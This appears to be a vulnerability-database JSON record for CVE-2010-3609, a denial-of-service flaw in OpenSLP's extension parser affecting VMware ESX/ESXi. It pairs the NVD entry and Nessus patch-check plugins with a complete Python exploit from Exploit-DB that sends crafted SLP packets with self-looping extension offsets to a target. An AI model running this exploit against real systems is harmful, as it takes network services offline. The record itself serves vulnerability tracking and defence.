{"cve": [{"lastseen": "2021-02-02T05:45:02", "description": "The extension parser in slp_v2message.c in OpenSLP 1.2.1, and other versions before SVN revision 1647, as used in Service Location Protocol daemon (SLPD) in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, allows remote attackers to cause a denial of service (infinite loop) via a packet with a \"next extension offset\" that references this extension or a previous extension. NOTE: some of these details are obtained from third party information.", "edition": 4, "cvss3": {}, "published": "2011-03-11T17:55:00", "title": "CVE-2010-3609", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3609"], "modified": "2018-10-10T20:04:00", "cpe": ["cpe:/a:vmware:esxi:4.0", "cpe:/a:vmware:esx:4.1", "cpe:/a:vmware:esx:4.0", "cpe:/a:vmware:esxi:4.1", "cpe:/a:openslp:openslp:1.2.1"], "id": "CVE-2010-3609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3609", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:openslp:openslp:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esxi:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esx:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esx:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esxi:4.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T08:12:53", "description": "OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit. CVE-2010-3609. Dos exploits for multiple platform", "published": "2011-08-05T00:00:00", "type": "exploitdb", "title": "OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3609"], "modified": "2011-08-05T00:00:00", "id": "EDB-ID:17610", "href": "https://www.exploit-db.com/exploits/17610/", "sourceData": "#!/usr/bin/python\r\n\r\n# Title: OpenSLP DoS\r\n# Author: Nicolas Gregoire (@Agarri_FR)\r\n# CVE: 2010-3609\r\n# Software download: http://www.openslp.org/download.html \r\n# Version: v1.2.1 and trunk before revision 1647\r\n# Tested on: Linux Ubuntu 10.04, VMware ESX 4.0\r\n# Notes: It affects some others SLP softwares, like mSLP. More details (in French) on my blog => http://goo.gl/s0zHq\r\n\r\n''' ==================================\r\n Pseudo documentation \r\n================================== '''\r\n\r\n# SLPick, extension DoS release\r\n# by Nicolas Gregoire\r\n\r\n''' ==================================\r\n Imports \r\n================================== '''\r\n\r\nimport getopt\r\nimport re\r\nimport sys\r\nimport binascii\r\nimport struct\r\nimport socket\r\nimport os\r\n\r\n\r\n''' ==================================\r\n Default values\r\n================================== '''\r\n\r\nversion = '0.4'\r\nmode = 'unicast'\r\nsource = 'N/A'\r\ntarget = 'N/A'\r\nxid = '\\x12\\x34'\r\nport = 427\r\nnb = 1\r\nreq = 'sr'\r\n\r\n''' ==================================\r\n Standard functions\r\n================================== '''\r\n\r\n# Some nice formatting\r\ndef zprint(str):\r\n\tprint '[=] ' + str\r\n\r\n# Function displaying CLI arguments\r\ndef showUsage():\r\n print 'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]'\r\n print '\\t[-h] Help (this text)'\r\n print '\\t[-m] Mode : tcp / unicast / broadcast / multicast (default is \"' + mode + '\")'\r\n print '\\t[-p] Port : default is \"' + str(port) + '\"'\r\n print '\\t[-s] Source IP Adress : no default (used only in multicast mode)'\r\n print '\\t[-t] Target IP Adress : no default (forced in multicast mode)'\r\n print '\\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)'\r\n print '\\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)'\r\n sys.exit(1)\r\n\r\n# Function parsing parameters\r\ndef getArguments():\r\n try:\r\n optlist, list = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:')\r\n except getopt.GetoptError:\r\n showUsage()\r\n for opt in optlist:\r\n if opt[0] == '-h':\r\n showUsage()\r\n if opt[0] == '-p':\r\n global port\r\n port = opt[1]\r\n if opt[0] == '-s':\r\n global source\r\n source = opt[1]\r\n if opt[0] == '-t':\r\n global target\r\n target = opt[1]\r\n if opt[0] == '-m':\r\n global mode\r\n\t mode = opt[1]\r\n if opt[0] == '-n':\r\n global nb\r\n\t nb = int(opt[1])\r\n if opt[0] == '-r':\r\n global req\r\n\t req = opt[1]\r\n\r\n# Function checking parameters\r\ndef checkArguments():\r\n if (mode == 'multicast'):\r\n # XID : must be 0 in multicast mode\r\n # Target IP : default SLP multicast address\r\n # Source IP : address of the local interface \r\n global xid\r\n xid = '\\x00\\x00'\r\n\tzprint('Forcing XID to \"0\"')\r\n global target\r\n\ttarget = '239.255.255.253'\r\n\tzprint('Forcing target IP to \"' + target + '\"')\r\n if (source != 'N/A') :\r\n\t zprint('Forcing source IP to \"' + source + '\"')\r\n else:\r\n\t zprint('You need to force the source address with \"-s\" !')\r\n showUsage()\r\n elif (mode == 'unicast') or (mode == 'broadcast') or (mode == 'multicast') or (mode == 'tcp'):\r\n # Target IP : must be defined\r\n if (target == 'N/A') :\r\n zprint('Invalid target !')\r\n showUsage()\r\n else :\r\n zprint('Invalid mode !')\r\n showUsage()\r\n\r\n''' ==================================\r\n SLP functions\r\n================================== '''\r\n\r\n# Define payload of type \"Service Request\"\r\ndef getServRequest():\r\n\r\n\tzprint('Creating payload of type \"Service Request\"')\r\n\r\n\t# Function type\r\n\tf = '\\x01'\r\n\t# Empty fields\r\n\tprevious_list_length = '\\x00\\x00'\r\n\tpredicate_length = '\\x00\\x00'\r\n\tscope_length = '\\x00\\x00'\r\n\tspi_length = '\\x00\\x00'\r\n\t# Variable-size fields\r\n\tservice = 'service:directory-agent'\r\n\tservice_length = struct.pack('!h', len(service)) \r\n\t# Create message\r\n\tm = previous_list_length + service_length + service\r\n\tm += predicate_length + scope_length + spi_length\r\n\r\n\treturn(f, m)\r\n\r\n# Define payload of type \"Attribute Request\"\r\ndef getAttrRequest():\r\n\r\n\tzprint('Creating payload of type \"Attribue Request\"')\r\n\r\n\t# Function type\r\n\tf = '\\x06'\r\n\t# Empty fields\r\n\tprevious_list_length = '\\x00\\x00'\r\n\ttag_length = '\\x00\\x00'\r\n\tspi_length = '\\x00\\x00'\r\n\t# Variable-size fields\r\n\turl = 'http://www.agarri.fr/'\r\n\turl_length = struct.pack('!h', len(url)) \r\n\tscope = 'default'\r\n\tscope_length = struct.pack('!h', len(scope)) \r\n\t# Create message\r\n\tm = previous_list_length\r\n\tm += url_length + url + scope_length + scope\r\n\tm += tag_length + spi_length\r\n\r\n\treturn(f, m)\r\n\r\n# Define the function creating the full SLP packet\r\ndef createPacket(function, message):\r\n\r\n\tzprint('Adding headers and trailers')\r\n\r\n\t# SLP Version\r\n\tversion = '\\x02'\r\n # Set the 'Multicast required' flag to 1\r\n\tif (mode == 'broadcast' or mode == 'multicast'):\r\n\t flags = '\\x20\\x00'\r\n else:\r\n flags = '\\x00\\x00'\r\n\r\n #######################################################\r\n # Here's the bug !!!!\r\n #######################################################\r\n zprint('Using ' + str(nb) + ' extension(s)')\r\n if (nb == 0):\r\n # No extension == no bug\r\n\t next_ext_offset = '\\x00\\x00\\x00'\r\n\t extension = ''\r\n\telif (nb == 1):\r\n # Loop over itself\r\n\t next_ext_offset = '\\x00\\x00\\x05'\r\n\t extension = ''\r\n elif (nb == 2) :\r\n # Point to another extension located at the end of the packet\r\n # TODO : Calculate it at runtime\r\n\t if (req == 'sr'):\r\n next_ext_offset = '\\x00\\x00\\x31'\r\n else :\r\n next_ext_offset = '\\x00\\x00\\x36'\r\n # OpenSLP : extid should be < 0x4000 or > 0x7FFF \r\n\t ext_id = '\\xBA\\xBE'\r\n # Loop over itself, 0x05 (back to previous extension) should work too \r\n\t ext_nextoffset = next_ext_offset\r\n\t # Could be anything\r\n ext_data = '\\x22\\x22'\r\n\t # Create the trailing extension\r\n extension = ext_id + ext_nextoffset + ext_data\r\n else:\r\n\t print 'Wrong number of extensions'\r\n sys.exit(1)\r\n\r\n\t# Variable-size headers\r\n\tlang = 'en'\r\n\tlang_length = struct.pack('!h', len(lang)) \r\n\r\n\t# Assemble headers\r\n\theaders = flags + next_ext_offset + xid + lang_length + lang\r\n\r\n\t# Packet = version + function + overall size + headers + message + extension\r\n\tpacket = version + function + '\\x00'\r\n\tpacket += struct.pack('!h', len(headers + message + extension) + 5) \r\n\tpacket += headers + message + extension\r\n\r\n\treturn packet\r\n\r\n''' ==================================\r\n Send packet via TCP or UDP\r\n================================== '''\r\n\r\n# Send via TCP\r\ndef sendTcpPacket(packet):\r\n\r\n\tzprint('Sending packet via TCP [' + target + ']')\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\ts.settimeout(3)\r\n try:\r\n s.connect((target, port))\r\n except socket.error:\r\n zprint('Socket error (port closed ?)')\r\n sys.exit(1)\r\n\ts.send(packet)\r\n\ts.close\r\n\r\n# Send via unicast UDP\r\ndef sendUnicastPacket(packet):\r\n\r\n\tzprint('Sending packet via Unicast UDP [' + target + ']')\r\n\ts = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\r\n\ts.sendto( packet, (target, port) )\r\n\r\n# Send via broadcast UDP\r\ndef sendBroadcastPacket(packet):\r\n\r\n zprint('Sending packet via Broadcast UDP [' + target + ']')\r\n\ts = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\n\ts.sendto( packet, (target, port) )\r\n\r\n# Send via multicast UDP\r\ndef sendMulticastPacket(packet):\r\n\r\n\tzprint('Sending packet via Multicast UDP [' + target + ']')\r\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\r\n\tsock.bind((source, 6666)) # Select an interface (and an evil port ;-)\r\n\tsock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)\r\n\tsock.sendto(packet, (target, port) );\r\n\r\n''' ==================================\r\n Main code\r\n================================== '''\r\n\r\n# Print banner\r\nzprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)')\r\n\r\n# Set options\r\ngetArguments()\r\ncheckArguments()\r\n\r\n# Which payload ?\r\nif (req == 'ar'):\r\n func, payload = getAttrRequest()\r\nelse :\r\n func, payload = getServRequest()\r\n\r\n# Add headers and trailers (including extensions)\r\npacket = createPacket(func, payload)\r\n\r\n# TCP\r\nif (mode == 'tcp'):\r\n\tsendTcpPacket(packet)\r\n# UDP\r\nelif (mode == 'unicast'):\r\n\tsendUnicastPacket(packet)\r\nelif (mode == 'broadcast'):\r\n\tsendBroadcastPacket(packet)\r\nelif (mode == 'multicast'):\r\n\tsendMulticastPacket(packet)\r\n\r\n# Exit\r\nzprint('Exit')\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17610/"}], "nessus": [{"lastseen": "2021-01-07T11:54:07", "description": "Updated openslp packages fix security vulnerability :\n\nThe extension parser in slp_v2message.c in OpenSLP 1.2.1 allows remote\nattackers to cause a denial of service (infinite loop) via a packet\nwith a next extension offset that references this extension or a\nprevious extension (CVE-2010-3609).", "edition": 25, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : openslp (MDVSA-2013:111)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:openslp", "p-cpe:/a:mandriva:linux:lib64openslp1-devel", "p-cpe:/a:mandriva:linux:lib64openslp1"], "id": "MANDRIVA_MDVSA-2013-111.NASL", "href": "https://www.tenable.com/plugins/nessus/66123", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:111. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66123);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-3609\");\n script_bugtraq_id(46772);\n script_xref(name:\"MDVSA\", value:\"2013:111\");\n script_xref(name:\"MGASA\", value:\"2012-0227\");\n\n script_name(english:\"Mandriva Linux Security Advisory : openslp (MDVSA-2013:111)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openslp packages fix security vulnerability :\n\nThe extension parser in slp_v2message.c in OpenSLP 1.2.1 allows remote\nattackers to cause a denial of service (infinite loop) via a packet\nwith a next extension offset that references this extension or a\nprevious extension (CVE-2010-3609).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected lib64openslp1, lib64openslp1-devel and / or\nopenslp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openslp1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openslp1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64openslp1-1.2.1-12.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64openslp1-devel-1.2.1-12.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"openslp-1.2.1-12.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T11:53:50", "description": "A vulnerability has been discovered and corrected in openslp :\n\nThe extension parser in slp_v2message.c in OpenSLP 1.2.1 allows remote\nattackers to cause a denial of service (infinite loop) via a packet\nwith a next extension offset that references this extension or a\nprevious extension (CVE-2010-3609).\n\nThe updated packages have been patched to correct this issue.", "edition": 25, "published": "2012-09-06T00:00:00", "title": "Mandriva Linux Security Advisory : openslp (MDVSA-2012:141)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2012-09-06T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:openslp", "p-cpe:/a:mandriva:linux:lib64openslp1-devel", "p-cpe:/a:mandriva:linux:libopenslp1", "p-cpe:/a:mandriva:linux:libopenslp1-devel", "p-cpe:/a:mandriva:linux:lib64openslp1"], "id": "MANDRIVA_MDVSA-2012-141.NASL", "href": "https://www.tenable.com/plugins/nessus/61986", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:141. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61986);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-3609\");\n script_bugtraq_id(46772);\n script_xref(name:\"MDVSA\", value:\"2012:141\");\n\n script_name(english:\"Mandriva Linux Security Advisory : openslp (MDVSA-2012:141)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in openslp :\n\nThe extension parser in slp_v2message.c in OpenSLP 1.2.1 allows remote\nattackers to cause a denial of service (infinite loop) via a packet\nwith a next extension offset that references this extension or a\nprevious extension (CVE-2010-3609).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openslp1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openslp1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenslp1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenslp1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64openslp1-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64openslp1-devel-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libopenslp1-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libopenslp1-devel-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"openslp-1.2.1-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:13:48", "description": "The openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609). This has been fixed.\n\nAdditionally the following non-security bugs were fixed :\n\n - 564504: Fix handling of DA answers if both active and\n passive DA detection is off\n\n - 597215: Add configuration options to openSLP:\n net.slp.DASyncReg makes slpd query statically configured\n DAs for registrations, net.slp.isDABackup enables\n periodic writing of remote registrations to a backup\n file which is also read on startup. Both options can be\n used to decrease the time between the start of the slpd\n daemon and slpd knowing all registrations.\n\n - 601002: reduce CPU usage spikes on machines with many\n connections by using the kernel netlink interface\n instead of reading the /proc filesystem.\n\n - 626444: Standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.", "edition": 23, "published": "2011-01-21T00:00:00", "title": "SuSE 11.1 Security Update : openSLP (SAT Patch Number 3312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2011-01-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:openslp-32bit", "p-cpe:/a:novell:suse_linux:11:openslp", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:openslp-server"], "id": "SUSE_11_OPENSLP-101012.NASL", "href": "https://www.tenable.com/plugins/nessus/51628", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51628);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"SuSE 11.1 Security Update : openSLP (SAT Patch Number 3312)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609). This has been fixed.\n\nAdditionally the following non-security bugs were fixed :\n\n - 564504: Fix handling of DA answers if both active and\n passive DA detection is off\n\n - 597215: Add configuration options to openSLP:\n net.slp.DASyncReg makes slpd query statically configured\n DAs for registrations, net.slp.isDABackup enables\n periodic writing of remote registrations to a backup\n file which is also read on startup. Both options can be\n used to decrease the time between the start of the slpd\n daemon and slpd knowing all registrations.\n\n - 601002: reduce CPU usage spikes on machines with many\n connections by using the kernel netlink interface\n instead of reading the /proc filesystem.\n\n - 626444: Standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=597215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=601002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=626444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3609.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 3312.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"openslp-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"openslp-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"openslp-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"openslp-server-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"openslp-32bit-1.2.0-172.15.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-172.15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:07:59", "description": "the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openslp-devel", "p-cpe:/a:novell:opensuse:openslp-32bit", "p-cpe:/a:novell:opensuse:openslp-server", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:openslp"], "id": "SUSE_11_3_OPENSLP-101012.NASL", "href": 